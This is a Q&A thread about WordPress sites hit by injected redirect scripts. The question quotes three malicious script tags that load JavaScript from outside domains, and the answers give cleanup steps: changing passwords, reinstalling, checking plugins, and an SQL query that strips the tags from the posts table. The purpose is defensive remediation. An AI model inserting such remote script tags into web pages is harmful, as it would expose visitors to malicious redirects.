# Malicious code in Wordpress (Malicious Redirects)

Tags: wordpress, security, malware

I have a problem with many worpdress sites where some scripts are nested generating redirects. Some scripts may be the following:

```
<script src='https://pr.uustoughtonma.org/d.js' type='text/javascript'> </script>
<script src='https://s2.voipnewswire.net/s2.js' type='text/javascript'></script>
<script src='https://cdn.examhome.net/cdn.js?ver=1.0.5' type='text/javascript'></script>
```

I would like to know if there is a known vulnerability and a way to solve the problem. The wordpress version is 4.9.8, the sites have different plugins and different themes (all updated), it would seem that the vulnerability does not depend on a specific plugin or theme. Thank you.

Comment: If you have malicious code in your installations, then you have been hacked. It usually happens when admins are procrastinating updates. To solve the issue, you should at least remove the malicious scripts and change all passwords. The problem is that once you have been compromised, you're not really "safe" until you wipe the installation clean.

Comment: Similar attack which I encountered - https://kiranvj.com/blog/blog/wordpress-malware-ch-trainresistor-cc/

Answer (score 0, accepted):

in my case i need to cleanup my database.

The most infected Table was: wp_posts

Answer (score 0):

First step is to change all passwords to server(cpanel, ftp, ect), Wordpress and the database. (use stupid long hard passwords on everything! Utilize WordPress's password generator.)

Second is get all fresh updated versions of WordPress, your plugins and your theme.

Next see if you have a vulnerable plugin installed. If so delete that plugin. Install this plugin:

https://wordpress.org/plugins/vulnerable-plugin-checker

Note that a fresh install doesn't always do the trick, really depends on the type of hack. There are many instances where a file will recreate all the malicious files again. It can even be above the root of your website root folder! After a fresh install and the other steps, if things regenerate it's best to actually just switch to a new server or reformat the server if you have the option.

I would also recommend some plugins for enhanced security moving forward. https://wordpress.org/plugins/ninjafirewall

https://wordpress.org/plugins/better-wp-security (brute force, directory rename are top features here)

Answer (score 0):

Thank you all. I solved my problem in different sites searching in the post_content field of the wp_post table and proceeding with a replacement of the part of the field containing the script.

```
UPDATE nameDB.wp_posts
SET post_content = REPLACE (post_content, "<script src = 'urlscript' type = 'text / javascript'> </ script>", "")
```

In the end I updated all the plugins and the core (if needed)